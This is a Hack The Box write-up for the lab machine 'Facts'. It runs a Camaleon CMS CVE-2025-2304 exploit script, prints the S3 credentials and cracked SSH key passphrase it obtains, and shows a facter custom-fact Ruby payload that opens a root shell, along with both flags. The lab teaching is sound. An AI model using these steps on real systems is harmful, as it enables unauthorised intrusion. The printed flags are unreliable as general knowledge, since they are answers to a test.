Hack The Box

Facts

HTBEasyLinuxWebPrivEsc

Summary

Facts is an Easy Linux machine running Camaleon CMS, vulnerable to an authenticated privilege escalation (CVE-2025-2304). Exploiting it exposes AWS S3 credentials pointing at an internal S3-compatible service, where a private SSH key is stored. The key (cracked with john) grants SSH access, and a sudo rule on facter is abused to run arbitrary Ruby and escalate to root.

Machine Information

Name	Difficulty	OS	Platform
Facts	Easy	Linux	Hack The Box

Attack Path

Nmap reveals HTTP and SSH.
Web enumeration identifies an admin panel.
The Camaleon CMS is exploited (CVE-2025-2304).
AWS S3 credentials are extracted.
A private SSH key is downloaded from an internal bucket.
SSH access is obtained.
sudo enumeration finds an allowed facter binary.
facter is abused to run Ruby and escalate to root.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sV -T5 -sC 10.129.19.58

Nmap Scan

Port	Service	Notes
22	SSH	OpenSSH 9.9p1
80	HTTP	nginx (Ubuntu)

Web Enumeration

The web application on port 80 was a site named Facts.

Web page

Content discovery with Gobuster:

gobuster dir -u http://facts.htb/ -w /usr/share/wordlists/dirb/common.txt

Gobuster

Findings:

/admin redirects to /admin/login
Hidden directories (.git, env-like files)
Evidence of an administrative panel

Exploitation — Camaleon CMS (CVE-2025-2304)

The application uses Camaleon CMS v2.9.0, vulnerable to an authenticated privilege escalation (CVE-2025-2304).

python exploit.py -u http://facts.htb/ -U abc -P abc -e -r

Exploit

This elevated privileges inside the CMS and exposed AWS S3 credentials:

Access Key: AKIA13F1EA8B94A4DE85
Secret Key: AiZzRMmU6R3jv2SYM6D5hLjifqmIGCio9L0g/R2r
Endpoint:   http://localhost:54321

Initial Access

Using the AWS CLI against the internal endpoint:

aws --endpoint-url http://facts.htb:54321 s3 ls

Two buckets were found (internal, randomfacts). Sensitive files were downloaded from the internal bucket:

aws --endpoint-url http://facts.htb:54321 s3 cp s3://internal/.ssh/authorized_keys .
aws --endpoint-url http://facts.htb:54321 s3 cp s3://internal/.ssh/id_ed25519 .

AWS

The private key passphrase was cracked offline:

ssh2john id_ed25519 > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

John

passphrase: dragonballz

SSH access was then obtained with the key:

ssh -i id_ed25519 trivia@10.129.19.58

Privilege Escalation

Enumeration

sudo -l

User trivia may run: /usr/bin/facter

Abusing facter

facter loads custom facts, allowing arbitrary Ruby execution. A malicious fact was created to spawn a privileged shell:

# /tmp/pwn.rb
Facter.add(:pwn) do
  setcode { exec("/bin/bash -p") }
end

sudo facter --custom-dir=/tmp pwn

This spawned a shell as root.

Flags

User

cat /home/william/user.txt

4d4b5ae95ae5d03f02e36d20ed2fd319

Root

cat /root/root.txt

a09e07c25af8e613bfc5747fb73823d3

Vulnerabilities Identified

Privilege Escalation in Camaleon CMS (CVE-2025-2304)

An authenticated flaw allowed elevating privileges within the CMS and accessing sensitive data.

Impact: full application compromise and access to internal infrastructure (S3).

Insecure S3 Exposure

An internal S3 bucket was accessible and stored sensitive .ssh files.

Impact: disclosure of a private SSH key and direct system access.

Misconfigured sudo (facter)

facter could be run as root and executes arbitrary Ruby.

Impact: full privilege escalation to root.

Tools Used

Nmap
Gobuster
AWS CLI
John the Ripper
SSH
Python exploit
Facter

Key Takeaways

Always fingerprint the CMS and version to find public exploits.
Exposed credentials frequently cascade into full compromise.
Misconfigured S3 buckets are critical when they hold keys or secrets.
sudo on interpreted binaries (Ruby/Python) is an easy privesc path.